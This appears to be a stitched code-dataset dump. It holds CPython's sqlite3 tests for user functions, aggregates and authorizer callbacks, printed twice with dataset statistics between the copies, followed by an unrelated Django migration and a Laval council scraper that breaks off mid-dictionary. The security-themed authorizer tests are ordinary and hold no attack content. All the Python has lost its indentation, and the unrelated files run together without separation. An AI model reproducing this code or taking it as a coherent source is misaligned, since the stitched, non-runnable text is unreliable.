#
# Copyright (C) 2005-2007 Gerhard Häring <[email protected]>
#
# This file is part of pysqlite.
#
# This software is provided 'as-is', without any express or implied
# warranty. In no event will the authors be held liable for any damages
# arising from the use of this software.
#
# Permission is granted to anyone to use this software for any purpose,
# including commercial applications, and to alter it and redistribute it
# freely, subject to the following restrictions:
#
# 1. The origin of this software must not be misrepresented; you must not
# claim that you wrote the original software. If you use this software
# in a product, an acknowledgment in the product documentation would be
# appreciated but is not required.
# 2. Altered source versions must be plainly marked as such, and must not be
# misrepresented as being the original software.
# 3. This notice may not be removed or altered from any source distribution.
import unittest
import unittest.mock
import sqlite3 as sqlite
def func_returntext():
return "foo"
def func_returntextwithnull():
return "1\x002"
def func_returnunicode():
return "bar"
def func_returnint():
return 42
def func_returnfloat():
return 3.14
def func_returnnull():
return None
def func_returnblob():
return b"blob"
def func_returnlonglong():
return 1<<31
def func_raiseexception():
5/0
def func_isstring(v):
return type(v) is str
def func_isint(v):
return type(v) is int
def func_isfloat(v):
return type(v) is float
def func_isnone(v):
return type(v) is type(None)
def func_isblob(v):
return isinstance(v, (bytes, memoryview))
def func_islonglong(v):
return isinstance(v, int) and v >= 1<<31
def func(*args):
return len(args)
class AggrNoStep:
def __init__(self):
pass
def finalize(self):
return 1
class AggrNoFinalize:
def __init__(self):
pass
def step(self, x):
pass
class AggrExceptionInInit:
def __init__(self):
5/0
def step(self, x):
pass
def finalize(self):
pass
class AggrExceptionInStep:
def __init__(self):
pass
def step(self, x):
5/0
def finalize(self):
return 42
class AggrExceptionInFinalize:
def __init__(self):
pass
def step(self, x):
pass
def finalize(self):
5/0
class AggrCheckType:
def __init__(self):
self.val = None
def step(self, whichType, val):
theType = {"str": str, "int": int, "float": float, "None": type(None),
"blob": bytes}
self.val = int(theType[whichType] is type(val))
def finalize(self):
return self.val
class AggrCheckTypes:
def __init__(self):
self.val = 0
def step(self, whichType, *vals):
theType = {"str": str, "int": int, "float": float, "None": type(None),
"blob": bytes}
for val in vals:
self.val += int(theType[whichType] is type(val))
def finalize(self):
return self.val
class AggrSum:
def __init__(self):
self.val = 0.0
def step(self, val):
self.val += val
def finalize(self):
return self.val
class AggrText:
def __init__(self):
self.txt = ""
def step(self, txt):
self.txt = self.txt + txt
def finalize(self):
return self.txt
class FunctionTests(unittest.TestCase):
def setUp(self):
self.con = sqlite.connect(":memory:")
self.con.create_function("returntext", 0, func_returntext)
self.con.create_function("returntextwithnull", 0, func_returntextwithnull)
self.con.create_function("returnunicode", 0, func_returnunicode)
self.con.create_function("returnint", 0, func_returnint)
self.con.create_function("returnfloat", 0, func_returnfloat)
self.con.create_function("returnnull", 0, func_returnnull)
self.con.create_function("returnblob", 0, func_returnblob)
self.con.create_function("returnlonglong", 0, func_returnlonglong)
self.con.create_function("raiseexception", 0, func_raiseexception)
self.con.create_function("isstring", 1, func_isstring)
self.con.create_function("isint", 1, func_isint)
self.con.create_function("isfloat", 1, func_isfloat)
self.con.create_function("isnone", 1, func_isnone)
self.con.create_function("isblob", 1, func_isblob)
self.con.create_function("islonglong", 1, func_islonglong)
self.con.create_function("spam", -1, func)
self.con.execute("create table test(t text)")
def tearDown(self):
self.con.close()
def CheckFuncErrorOnCreate(self):
with self.assertRaises(sqlite.OperationalError):
self.con.create_function("bla", -100, lambda x: 2*x)
def CheckFuncRefCount(self):
def getfunc():
def f():
return 1
return f
f = getfunc()
globals()["foo"] = f
# self.con.create_function("reftest", 0, getfunc())
self.con.create_function("reftest", 0, f)
cur = self.con.cursor()
cur.execute("select reftest()")
def CheckFuncReturnText(self):
cur = self.con.cursor()
cur.execute("select returntext()")
val = cur.fetchone()[0]
self.assertEqual(type(val), str)
self.assertEqual(val, "foo")
def CheckFuncReturnTextWithNullChar(self):
cur = self.con.cursor()
res = cur.execute("select returntextwithnull()").fetchone()[0]
self.assertEqual(type(res), str)
self.assertEqual(res, "1\x002")
def CheckFuncReturnUnicode(self):
cur = self.con.cursor()
cur.execute("select returnunicode()")
val = cur.fetchone()[0]
self.assertEqual(type(val), str)
self.assertEqual(val, "bar")
def CheckFuncReturnInt(self):
cur = self.con.cursor()
cur.execute("select returnint()")
val = cur.fetchone()[0]
self.assertEqual(type(val), int)
self.assertEqual(val, 42)
def CheckFuncReturnFloat(self):
cur = self.con.cursor()
cur.execute("select returnfloat()")
val = cur.fetchone()[0]
self.assertEqual(type(val), float)
if val < 3.139 or val > 3.141:
self.fail("wrong value")
def CheckFuncReturnNull(self):
cur = self.con.cursor()
cur.execute("select returnnull()")
val = cur.fetchone()[0]
self.assertEqual(type(val), type(None))
self.assertEqual(val, None)
def CheckFuncReturnBlob(self):
cur = self.con.cursor()
cur.execute("select returnblob()")
val = cur.fetchone()[0]
self.assertEqual(type(val), bytes)
self.assertEqual(val, b"blob")
def CheckFuncReturnLongLong(self):
cur = self.con.cursor()
cur.execute("select returnlonglong()")
val = cur.fetchone()[0]
self.assertEqual(val, 1<<31)
def CheckFuncException(self):
cur = self.con.cursor()
with self.assertRaises(sqlite.OperationalError) as cm:
cur.execute("select raiseexception()")
cur.fetchone()
self.assertEqual(str(cm.exception), 'user-defined function raised exception')
def CheckParamString(self):
cur = self.con.cursor()
for text in ["foo", str()]:
with self.subTest(text=text):
cur.execute("select isstring(?)", (text,))
val = cur.fetchone()[0]
self.assertEqual(val, 1)
def CheckParamInt(self):
cur = self.con.cursor()
cur.execute("select isint(?)", (42,))
val = cur.fetchone()[0]
self.assertEqual(val, 1)
def CheckParamFloat(self):
cur = self.con.cursor()
cur.execute("select isfloat(?)", (3.14,))
val = cur.fetchone()[0]
self.assertEqual(val, 1)
def CheckParamNone(self):
cur = self.con.cursor()
cur.execute("select isnone(?)", (None,))
val = cur.fetchone()[0]
self.assertEqual(val, 1)
def CheckParamBlob(self):
cur = self.con.cursor()
cur.execute("select isblob(?)", (memoryview(b"blob"),))
val = cur.fetchone()[0]
self.assertEqual(val, 1)
def CheckParamLongLong(self):
cur = self.con.cursor()
cur.execute("select islonglong(?)", (1<<42,))
val = cur.fetchone()[0]
self.assertEqual(val, 1)
def CheckAnyArguments(self):
cur = self.con.cursor()
cur.execute("select spam(?, ?)", (1, 2))
val = cur.fetchone()[0]
self.assertEqual(val, 2)
# Regarding deterministic functions:
#
# Between 3.8.3 and 3.15.0, deterministic functions were only used to
# optimize inner loops, so for those versions we can only test if the
# sqlite machinery has factored out a call or not. From 3.15.0 and onward,
# deterministic functions were permitted in WHERE clauses of partial
# indices, which allows testing based on syntax, iso. the query optimizer.
@unittest.skipIf(sqlite.sqlite_version_info < (3, 8, 3), "Requires SQLite 3.8.3 or higher")
def CheckFuncNonDeterministic(self):
mock = unittest.mock.Mock(return_value=None)
self.con.create_function("nondeterministic", 0, mock, deterministic=False)
if sqlite.sqlite_version_info < (3, 15, 0):
self.con.execute("select nondeterministic() = nondeterministic()")
self.assertEqual(mock.call_count, 2)
else:
with self.assertRaises(sqlite.OperationalError):
self.con.execute("create index t on test(t) where nondeterministic() is not null")
@unittest.skipIf(sqlite.sqlite_version_info < (3, 8, 3), "Requires SQLite 3.8.3 or higher")
def CheckFuncDeterministic(self):
mock = unittest.mock.Mock(return_value=None)
self.con.create_function("deterministic", 0, mock, deterministic=True)
if sqlite.sqlite_version_info < (3, 15, 0):
self.con.execute("select deterministic() = deterministic()")
self.assertEqual(mock.call_count, 1)
else:
try:
self.con.execute("create index t on test(t) where deterministic() is not null")
except sqlite.OperationalError:
self.fail("Unexpected failure while creating partial index")
@unittest.skipIf(sqlite.sqlite_version_info >= (3, 8, 3), "SQLite < 3.8.3 needed")
def CheckFuncDeterministicNotSupported(self):
with self.assertRaises(sqlite.NotSupportedError):
self.con.create_function("deterministic", 0, int, deterministic=True)
def CheckFuncDeterministicKeywordOnly(self):
with self.assertRaises(TypeError):
self.con.create_function("deterministic", 0, int, True)
class AggregateTests(unittest.TestCase):
def setUp(self):
self.con = sqlite.connect(":memory:")
cur = self.con.cursor()
cur.execute("""
create table test(
t text,
i integer,
f float,
n,
b blob
)
""")
cur.execute("insert into test(t, i, f, n, b) values (?, ?, ?, ?, ?)",
("foo", 5, 3.14, None, memoryview(b"blob"),))
self.con.create_aggregate("nostep", 1, AggrNoStep)
self.con.create_aggregate("nofinalize", 1, AggrNoFinalize)
self.con.create_aggregate("excInit", 1, AggrExceptionInInit)
self.con.create_aggregate("excStep", 1, AggrExceptionInStep)
self.con.create_aggregate("excFinalize", 1, AggrExceptionInFinalize)
self.con.create_aggregate("checkType", 2, AggrCheckType)
self.con.create_aggregate("checkTypes", -1, AggrCheckTypes)
self.con.create_aggregate("mysum", 1, AggrSum)
self.con.create_aggregate("aggtxt", 1, AggrText)
def tearDown(self):
#self.cur.close()
#self.con.close()
pass
def CheckAggrErrorOnCreate(self):
with self.assertRaises(sqlite.OperationalError):
self.con.create_function("bla", -100, AggrSum)
def CheckAggrNoStep(self):
# XXX it's better to raise OperationalError in order to stop
# the query earlier.
cur = self.con.cursor()
with self.assertRaises(sqlite.OperationalError) as cm:
cur.execute("select nostep(t) from test")
self.assertEqual(str(cm.exception), "user-defined aggregate's 'step' method raised error")
def CheckAggrNoFinalize(self):
cur = self.con.cursor()
with self.assertRaises(sqlite.OperationalError) as cm:
cur.execute("select nofinalize(t) from test")
val = cur.fetchone()[0]
self.assertEqual(str(cm.exception), "user-defined aggregate's 'finalize' method raised error")
def CheckAggrExceptionInInit(self):
cur = self.con.cursor()
with self.assertRaises(sqlite.OperationalError) as cm:
cur.execute("select excInit(t) from test")
val = cur.fetchone()[0]
self.assertEqual(str(cm.exception), "user-defined aggregate's '__init__' method raised error")
def CheckAggrExceptionInStep(self):
cur = self.con.cursor()
with self.assertRaises(sqlite.OperationalError) as cm:
cur.execute("select excStep(t) from test")
val = cur.fetchone()[0]
self.assertEqual(str(cm.exception), "user-defined aggregate's 'step' method raised error")
def CheckAggrExceptionInFinalize(self):
cur = self.con.cursor()
with self.assertRaises(sqlite.OperationalError) as cm:
cur.execute("select excFinalize(t) from test")
val = cur.fetchone()[0]
self.assertEqual(str(cm.exception), "user-defined aggregate's 'finalize' method raised error")
def CheckAggrCheckParamStr(self):
cur = self.con.cursor()
cur.execute("select checkTypes('str', ?, ?)", ("foo", str()))
val = cur.fetchone()[0]
self.assertEqual(val, 2)
def CheckAggrCheckParamInt(self):
cur = self.con.cursor()
cur.execute("select checkType('int', ?)", (42,))
val = cur.fetchone()[0]
self.assertEqual(val, 1)
def CheckAggrCheckParamsInt(self):
cur = self.con.cursor()
cur.execute("select checkTypes('int', ?, ?)", (42, 24))
val = cur.fetchone()[0]
self.assertEqual(val, 2)
def CheckAggrCheckParamFloat(self):
cur = self.con.cursor()
cur.execute("select checkType('float', ?)", (3.14,))
val = cur.fetchone()[0]
self.assertEqual(val, 1)
def CheckAggrCheckParamNone(self):
cur = self.con.cursor()
cur.execute("select checkType('None', ?)", (None,))
val = cur.fetchone()[0]
self.assertEqual(val, 1)
def CheckAggrCheckParamBlob(self):
cur = self.con.cursor()
cur.execute("select checkType('blob', ?)", (memoryview(b"blob"),))
val = cur.fetchone()[0]
self.assertEqual(val, 1)
def CheckAggrCheckAggrSum(self):
cur = self.con.cursor()
cur.execute("delete from test")
cur.executemany("insert into test(i) values (?)", [(10,), (20,), (30,)])
cur.execute("select mysum(i) from test")
val = cur.fetchone()[0]
self.assertEqual(val, 60)
def CheckAggrText(self):
cur = self.con.cursor()
for txt in ["foo", "1\x002"]:
with self.subTest(txt=txt):
cur.execute("select aggtxt(?) from test", (txt,))
val = cur.fetchone()[0]
self.assertEqual(val, txt)
class AuthorizerTests(unittest.TestCase):
@staticmethod
def authorizer_cb(action, arg1, arg2, dbname, source):
if action != sqlite.SQLITE_SELECT:
return sqlite.SQLITE_DENY
if arg2 == 'c2' or arg1 == 't2':
return sqlite.SQLITE_DENY
return sqlite.SQLITE_OK
def setUp(self):
self.con = sqlite.connect(":memory:")
self.con.executescript("""
create table t1 (c1, c2);
create table t2 (c1, c2);
insert into t1 (c1, c2) values (1, 2);
insert into t2 (c1, c2) values (4, 5);
""")
# For our security test:
self.con.execute("select c2 from t2")
self.con.set_authorizer(self.authorizer_cb)
def tearDown(self):
pass
def test_table_access(self):
with self.assertRaises(sqlite.DatabaseError) as cm:
self.con.execute("select * from t2")
self.assertIn('prohibited', str(cm.exception))
def test_column_access(self):
with self.assertRaises(sqlite.DatabaseError) as cm:
self.con.execute("select c2 from t1")
self.assertIn('prohibited', str(cm.exception))
class AuthorizerRaiseExceptionTests(AuthorizerTests):
@staticmethod
def authorizer_cb(action, arg1, arg2, dbname, source):
if action != sqlite.SQLITE_SELECT:
raise ValueError
if arg2 == 'c2' or arg1 == 't2':
raise ValueError
return sqlite.SQLITE_OK
class AuthorizerIllegalTypeTests(AuthorizerTests):
@staticmethod
def authorizer_cb(action, arg1, arg2, dbname, source):
if action != sqlite.SQLITE_SELECT:
return 0.0
if arg2 == 'c2' or arg1 == 't2':
return 0.0
return sqlite.SQLITE_OK
class AuthorizerLargeIntegerTests(AuthorizerTests):
@staticmethod
def authorizer_cb(action, arg1, arg2, dbname, source):
if action != sqlite.SQLITE_SELECT:
return 2**32
if arg2 == 'c2' or arg1 == 't2':
return 2**32
return sqlite.SQLITE_OK
def suite():
function_suite = unittest.makeSuite(FunctionTests, "Check")
aggregate_suite = unittest.makeSuite(AggregateTests, "Check")
authorizer_suite = unittest.makeSuite(AuthorizerTests)
return unittest.TestSuite((
function_suite,
aggregate_suite,
authorizer_suite,
unittest.makeSuite(AuthorizerRaiseExceptionTests),
unittest.makeSuite(AuthorizerIllegalTypeTests),
unittest.makeSuite(AuthorizerLargeIntegerTests),
))
def test():
runner = unittest.TextTestRunner()
runner.run(suite())
if __name__ == "__main__":
test()
| 33.755027 | 102 | 0.620667 |
import unittest
import unittest.mock
import sqlite3 as sqlite
def func_returntext():
return "foo"
def func_returntextwithnull():
return "1\x002"
def func_returnunicode():
return "bar"
def func_returnint():
return 42
def func_returnfloat():
return 3.14
def func_returnnull():
return None
def func_returnblob():
return b"blob"
def func_returnlonglong():
return 1<<31
def func_raiseexception():
5/0
def func_isstring(v):
return type(v) is str
def func_isint(v):
return type(v) is int
def func_isfloat(v):
return type(v) is float
def func_isnone(v):
return type(v) is type(None)
def func_isblob(v):
return isinstance(v, (bytes, memoryview))
def func_islonglong(v):
return isinstance(v, int) and v >= 1<<31
def func(*args):
return len(args)
class AggrNoStep:
def __init__(self):
pass
def finalize(self):
return 1
class AggrNoFinalize:
def __init__(self):
pass
def step(self, x):
pass
class AggrExceptionInInit:
def __init__(self):
5/0
def step(self, x):
pass
def finalize(self):
pass
class AggrExceptionInStep:
def __init__(self):
pass
def step(self, x):
5/0
def finalize(self):
return 42
class AggrExceptionInFinalize:
def __init__(self):
pass
def step(self, x):
pass
def finalize(self):
5/0
class AggrCheckType:
def __init__(self):
self.val = None
def step(self, whichType, val):
theType = {"str": str, "int": int, "float": float, "None": type(None),
"blob": bytes}
self.val = int(theType[whichType] is type(val))
def finalize(self):
return self.val
class AggrCheckTypes:
def __init__(self):
self.val = 0
def step(self, whichType, *vals):
theType = {"str": str, "int": int, "float": float, "None": type(None),
"blob": bytes}
for val in vals:
self.val += int(theType[whichType] is type(val))
def finalize(self):
return self.val
class AggrSum:
def __init__(self):
self.val = 0.0
def step(self, val):
self.val += val
def finalize(self):
return self.val
class AggrText:
def __init__(self):
self.txt = ""
def step(self, txt):
self.txt = self.txt + txt
def finalize(self):
return self.txt
class FunctionTests(unittest.TestCase):
def setUp(self):
self.con = sqlite.connect(":memory:")
self.con.create_function("returntext", 0, func_returntext)
self.con.create_function("returntextwithnull", 0, func_returntextwithnull)
self.con.create_function("returnunicode", 0, func_returnunicode)
self.con.create_function("returnint", 0, func_returnint)
self.con.create_function("returnfloat", 0, func_returnfloat)
self.con.create_function("returnnull", 0, func_returnnull)
self.con.create_function("returnblob", 0, func_returnblob)
self.con.create_function("returnlonglong", 0, func_returnlonglong)
self.con.create_function("raiseexception", 0, func_raiseexception)
self.con.create_function("isstring", 1, func_isstring)
self.con.create_function("isint", 1, func_isint)
self.con.create_function("isfloat", 1, func_isfloat)
self.con.create_function("isnone", 1, func_isnone)
self.con.create_function("isblob", 1, func_isblob)
self.con.create_function("islonglong", 1, func_islonglong)
self.con.create_function("spam", -1, func)
self.con.execute("create table test(t text)")
def tearDown(self):
self.con.close()
def CheckFuncErrorOnCreate(self):
with self.assertRaises(sqlite.OperationalError):
self.con.create_function("bla", -100, lambda x: 2*x)
def CheckFuncRefCount(self):
def getfunc():
def f():
return 1
return f
f = getfunc()
globals()["foo"] = f
self.con.create_function("reftest", 0, f)
cur = self.con.cursor()
cur.execute("select reftest()")
def CheckFuncReturnText(self):
cur = self.con.cursor()
cur.execute("select returntext()")
val = cur.fetchone()[0]
self.assertEqual(type(val), str)
self.assertEqual(val, "foo")
def CheckFuncReturnTextWithNullChar(self):
cur = self.con.cursor()
res = cur.execute("select returntextwithnull()").fetchone()[0]
self.assertEqual(type(res), str)
self.assertEqual(res, "1\x002")
def CheckFuncReturnUnicode(self):
cur = self.con.cursor()
cur.execute("select returnunicode()")
val = cur.fetchone()[0]
self.assertEqual(type(val), str)
self.assertEqual(val, "bar")
def CheckFuncReturnInt(self):
cur = self.con.cursor()
cur.execute("select returnint()")
val = cur.fetchone()[0]
self.assertEqual(type(val), int)
self.assertEqual(val, 42)
def CheckFuncReturnFloat(self):
cur = self.con.cursor()
cur.execute("select returnfloat()")
val = cur.fetchone()[0]
self.assertEqual(type(val), float)
if val < 3.139 or val > 3.141:
self.fail("wrong value")
def CheckFuncReturnNull(self):
cur = self.con.cursor()
cur.execute("select returnnull()")
val = cur.fetchone()[0]
self.assertEqual(type(val), type(None))
self.assertEqual(val, None)
def CheckFuncReturnBlob(self):
cur = self.con.cursor()
cur.execute("select returnblob()")
val = cur.fetchone()[0]
self.assertEqual(type(val), bytes)
self.assertEqual(val, b"blob")
def CheckFuncReturnLongLong(self):
cur = self.con.cursor()
cur.execute("select returnlonglong()")
val = cur.fetchone()[0]
self.assertEqual(val, 1<<31)
def CheckFuncException(self):
cur = self.con.cursor()
with self.assertRaises(sqlite.OperationalError) as cm:
cur.execute("select raiseexception()")
cur.fetchone()
self.assertEqual(str(cm.exception), 'user-defined function raised exception')
def CheckParamString(self):
cur = self.con.cursor()
for text in ["foo", str()]:
with self.subTest(text=text):
cur.execute("select isstring(?)", (text,))
val = cur.fetchone()[0]
self.assertEqual(val, 1)
def CheckParamInt(self):
cur = self.con.cursor()
cur.execute("select isint(?)", (42,))
val = cur.fetchone()[0]
self.assertEqual(val, 1)
def CheckParamFloat(self):
cur = self.con.cursor()
cur.execute("select isfloat(?)", (3.14,))
val = cur.fetchone()[0]
self.assertEqual(val, 1)
def CheckParamNone(self):
cur = self.con.cursor()
cur.execute("select isnone(?)", (None,))
val = cur.fetchone()[0]
self.assertEqual(val, 1)
def CheckParamBlob(self):
cur = self.con.cursor()
cur.execute("select isblob(?)", (memoryview(b"blob"),))
val = cur.fetchone()[0]
self.assertEqual(val, 1)
def CheckParamLongLong(self):
cur = self.con.cursor()
cur.execute("select islonglong(?)", (1<<42,))
val = cur.fetchone()[0]
self.assertEqual(val, 1)
def CheckAnyArguments(self):
cur = self.con.cursor()
cur.execute("select spam(?, ?)", (1, 2))
val = cur.fetchone()[0]
self.assertEqual(val, 2)
@unittest.skipIf(sqlite.sqlite_version_info < (3, 8, 3), "Requires SQLite 3.8.3 or higher")
def CheckFuncNonDeterministic(self):
mock = unittest.mock.Mock(return_value=None)
self.con.create_function("nondeterministic", 0, mock, deterministic=False)
if sqlite.sqlite_version_info < (3, 15, 0):
self.con.execute("select nondeterministic() = nondeterministic()")
self.assertEqual(mock.call_count, 2)
else:
with self.assertRaises(sqlite.OperationalError):
self.con.execute("create index t on test(t) where nondeterministic() is not null")
@unittest.skipIf(sqlite.sqlite_version_info < (3, 8, 3), "Requires SQLite 3.8.3 or higher")
def CheckFuncDeterministic(self):
mock = unittest.mock.Mock(return_value=None)
self.con.create_function("deterministic", 0, mock, deterministic=True)
if sqlite.sqlite_version_info < (3, 15, 0):
self.con.execute("select deterministic() = deterministic()")
self.assertEqual(mock.call_count, 1)
else:
try:
self.con.execute("create index t on test(t) where deterministic() is not null")
except sqlite.OperationalError:
self.fail("Unexpected failure while creating partial index")
@unittest.skipIf(sqlite.sqlite_version_info >= (3, 8, 3), "SQLite < 3.8.3 needed")
def CheckFuncDeterministicNotSupported(self):
with self.assertRaises(sqlite.NotSupportedError):
self.con.create_function("deterministic", 0, int, deterministic=True)
def CheckFuncDeterministicKeywordOnly(self):
with self.assertRaises(TypeError):
self.con.create_function("deterministic", 0, int, True)
class AggregateTests(unittest.TestCase):
def setUp(self):
self.con = sqlite.connect(":memory:")
cur = self.con.cursor()
cur.execute("""
create table test(
t text,
i integer,
f float,
n,
b blob
)
""")
cur.execute("insert into test(t, i, f, n, b) values (?, ?, ?, ?, ?)",
("foo", 5, 3.14, None, memoryview(b"blob"),))
self.con.create_aggregate("nostep", 1, AggrNoStep)
self.con.create_aggregate("nofinalize", 1, AggrNoFinalize)
self.con.create_aggregate("excInit", 1, AggrExceptionInInit)
self.con.create_aggregate("excStep", 1, AggrExceptionInStep)
self.con.create_aggregate("excFinalize", 1, AggrExceptionInFinalize)
self.con.create_aggregate("checkType", 2, AggrCheckType)
self.con.create_aggregate("checkTypes", -1, AggrCheckTypes)
self.con.create_aggregate("mysum", 1, AggrSum)
self.con.create_aggregate("aggtxt", 1, AggrText)
def tearDown(self):
pass
def CheckAggrErrorOnCreate(self):
with self.assertRaises(sqlite.OperationalError):
self.con.create_function("bla", -100, AggrSum)
def CheckAggrNoStep(self):
# the query earlier.
cur = self.con.cursor()
with self.assertRaises(sqlite.OperationalError) as cm:
cur.execute("select nostep(t) from test")
self.assertEqual(str(cm.exception), "user-defined aggregate's 'step' method raised error")
def CheckAggrNoFinalize(self):
cur = self.con.cursor()
with self.assertRaises(sqlite.OperationalError) as cm:
cur.execute("select nofinalize(t) from test")
val = cur.fetchone()[0]
self.assertEqual(str(cm.exception), "user-defined aggregate's 'finalize' method raised error")
def CheckAggrExceptionInInit(self):
cur = self.con.cursor()
with self.assertRaises(sqlite.OperationalError) as cm:
cur.execute("select excInit(t) from test")
val = cur.fetchone()[0]
self.assertEqual(str(cm.exception), "user-defined aggregate's '__init__' method raised error")
def CheckAggrExceptionInStep(self):
cur = self.con.cursor()
with self.assertRaises(sqlite.OperationalError) as cm:
cur.execute("select excStep(t) from test")
val = cur.fetchone()[0]
self.assertEqual(str(cm.exception), "user-defined aggregate's 'step' method raised error")
def CheckAggrExceptionInFinalize(self):
cur = self.con.cursor()
with self.assertRaises(sqlite.OperationalError) as cm:
cur.execute("select excFinalize(t) from test")
val = cur.fetchone()[0]
self.assertEqual(str(cm.exception), "user-defined aggregate's 'finalize' method raised error")
def CheckAggrCheckParamStr(self):
cur = self.con.cursor()
cur.execute("select checkTypes('str', ?, ?)", ("foo", str()))
val = cur.fetchone()[0]
self.assertEqual(val, 2)
def CheckAggrCheckParamInt(self):
cur = self.con.cursor()
cur.execute("select checkType('int', ?)", (42,))
val = cur.fetchone()[0]
self.assertEqual(val, 1)
def CheckAggrCheckParamsInt(self):
cur = self.con.cursor()
cur.execute("select checkTypes('int', ?, ?)", (42, 24))
val = cur.fetchone()[0]
self.assertEqual(val, 2)
def CheckAggrCheckParamFloat(self):
cur = self.con.cursor()
cur.execute("select checkType('float', ?)", (3.14,))
val = cur.fetchone()[0]
self.assertEqual(val, 1)
def CheckAggrCheckParamNone(self):
cur = self.con.cursor()
cur.execute("select checkType('None', ?)", (None,))
val = cur.fetchone()[0]
self.assertEqual(val, 1)
def CheckAggrCheckParamBlob(self):
cur = self.con.cursor()
cur.execute("select checkType('blob', ?)", (memoryview(b"blob"),))
val = cur.fetchone()[0]
self.assertEqual(val, 1)
def CheckAggrCheckAggrSum(self):
cur = self.con.cursor()
cur.execute("delete from test")
cur.executemany("insert into test(i) values (?)", [(10,), (20,), (30,)])
cur.execute("select mysum(i) from test")
val = cur.fetchone()[0]
self.assertEqual(val, 60)
def CheckAggrText(self):
cur = self.con.cursor()
for txt in ["foo", "1\x002"]:
with self.subTest(txt=txt):
cur.execute("select aggtxt(?) from test", (txt,))
val = cur.fetchone()[0]
self.assertEqual(val, txt)
class AuthorizerTests(unittest.TestCase):
@staticmethod
def authorizer_cb(action, arg1, arg2, dbname, source):
if action != sqlite.SQLITE_SELECT:
return sqlite.SQLITE_DENY
if arg2 == 'c2' or arg1 == 't2':
return sqlite.SQLITE_DENY
return sqlite.SQLITE_OK
def setUp(self):
self.con = sqlite.connect(":memory:")
self.con.executescript("""
create table t1 (c1, c2);
create table t2 (c1, c2);
insert into t1 (c1, c2) values (1, 2);
insert into t2 (c1, c2) values (4, 5);
""")
self.con.execute("select c2 from t2")
self.con.set_authorizer(self.authorizer_cb)
def tearDown(self):
pass
def test_table_access(self):
with self.assertRaises(sqlite.DatabaseError) as cm:
self.con.execute("select * from t2")
self.assertIn('prohibited', str(cm.exception))
def test_column_access(self):
with self.assertRaises(sqlite.DatabaseError) as cm:
self.con.execute("select c2 from t1")
self.assertIn('prohibited', str(cm.exception))
class AuthorizerRaiseExceptionTests(AuthorizerTests):
@staticmethod
def authorizer_cb(action, arg1, arg2, dbname, source):
if action != sqlite.SQLITE_SELECT:
raise ValueError
if arg2 == 'c2' or arg1 == 't2':
raise ValueError
return sqlite.SQLITE_OK
class AuthorizerIllegalTypeTests(AuthorizerTests):
@staticmethod
def authorizer_cb(action, arg1, arg2, dbname, source):
if action != sqlite.SQLITE_SELECT:
return 0.0
if arg2 == 'c2' or arg1 == 't2':
return 0.0
return sqlite.SQLITE_OK
class AuthorizerLargeIntegerTests(AuthorizerTests):
@staticmethod
def authorizer_cb(action, arg1, arg2, dbname, source):
if action != sqlite.SQLITE_SELECT:
return 2**32
if arg2 == 'c2' or arg1 == 't2':
return 2**32
return sqlite.SQLITE_OK
def suite():
function_suite = unittest.makeSuite(FunctionTests, "Check")
aggregate_suite = unittest.makeSuite(AggregateTests, "Check")
authorizer_suite = unittest.makeSuite(AuthorizerTests)
return unittest.TestSuite((
function_suite,
aggregate_suite,
authorizer_suite,
unittest.makeSuite(AuthorizerRaiseExceptionTests),
unittest.makeSuite(AuthorizerIllegalTypeTests),
unittest.makeSuite(AuthorizerLargeIntegerTests),
))
def test():
runner = unittest.TextTestRunner()
runner.run(suite())
if __name__ == "__main__":
test()
| true | true |
1c4a96188ff3db551b42c8a2d3e9be167f0e99f7 | 653 | py | Python | server/user/migrations/0006_auto_20201019_2248.py | MetLee/hackergame | 571b5407e0644169a2f9b3907a0a1d93138ba436 | [
"MIT"
] | 48 | 2018-09-30T11:07:52.000Z | 2021-12-07T03:32:59.000Z | server/user/migrations/0006_auto_20201019_2248.py | MetLee/hackergame | 571b5407e0644169a2f9b3907a0a1d93138ba436 | [
"MIT"
] | 100 | 2018-10-13T18:37:25.000Z | 2021-11-11T12:14:45.000Z | server/user/migrations/0006_auto_20201019_2248.py | MetLee/hackergame | 571b5407e0644169a2f9b3907a0a1d93138ba436 | [
"MIT"
] | 11 | 2018-10-08T14:59:33.000Z | 2022-03-02T03:21:09.000Z | # Generated by Django 3.1.2 on 2020-10-19 14:48
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
('user', '0005_auto_20191011_1842'),
]
operations = [
migrations.AlterModelOptions(
name='user',
options={'default_permissions': (), 'permissions': [('full', '管理个人信息'), ('view_ustc', '查看中国科学技术大学个人信息'), ('view_zju', '查看浙江大学个人信息'), ('view_hit', '查看哈尔滨工业大学个人信息'), ('view_xjtu', '查看西安交通大学个人信息'), ('view_cqu', '查看重庆大学个人信息'), ('view_bupt', '查看北京邮电大学个人信息'), ('view_jlu', '查看吉林大学个人信息'), ('view_neu', '查看东北大学个人信息'), ('view_nuaa', '查看南京航空航天大学个人信息')]},
),
]
| 36.277778 | 356 | 0.623277 |
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
('user', '0005_auto_20191011_1842'),
]
operations = [
migrations.AlterModelOptions(
name='user',
options={'default_permissions': (), 'permissions': [('full', '管理个人信息'), ('view_ustc', '查看中国科学技术大学个人信息'), ('view_zju', '查看浙江大学个人信息'), ('view_hit', '查看哈尔滨工业大学个人信息'), ('view_xjtu', '查看西安交通大学个人信息'), ('view_cqu', '查看重庆大学个人信息'), ('view_bupt', '查看北京邮电大学个人信息'), ('view_jlu', '查看吉林大学个人信息'), ('view_neu', '查看东北大学个人信息'), ('view_nuaa', '查看南京航空航天大学个人信息')]},
),
]
| true | true |
1c4a96d25b3a08d0d02147c25f00e9fdc0faa420 | 1,458 | py | Python | ca_qc_laval/people.py | dcycle/scrapers-ca | 4c7a6cd01d603221b5b3b7a400d2e5ca0c6e916f | [
"MIT"
] | null | null | null | ca_qc_laval/people.py | dcycle/scrapers-ca | 4c7a6cd01d603221b5b3b7a400d2e5ca0c6e916f | [
"MIT"
] | null | null | null | ca_qc_laval/people.py | dcycle/scrapers-ca | 4c7a6cd01d603221b5b3b7a400d2e5ca0c6e916f | [
"MIT"
] | null | null | null | # coding: utf-8
from utils import CSVScraper
class LavalPersonScraper(CSVScraper):
# https://www.donneesquebec.ca/recherche/fr/dataset/liste-des-elus
csv_url = 'https://www.donneesquebec.ca/recherche/dataset/8fe69713-fade-4751-a0b4-7e57a81886b1/resource/bb38e19e-26ab-495c-a0f7-ed6b3268b6e6/download/cusersapp.netappdatalocaltemp288c1490-df30-472a-8170-dd06728f449alistedeselus2013-2017.csv'
encoding = 'utf-8-sig'
locale = 'fr'
# Laval also removes accents and cedillas from data.
corrections = {
'district name': {
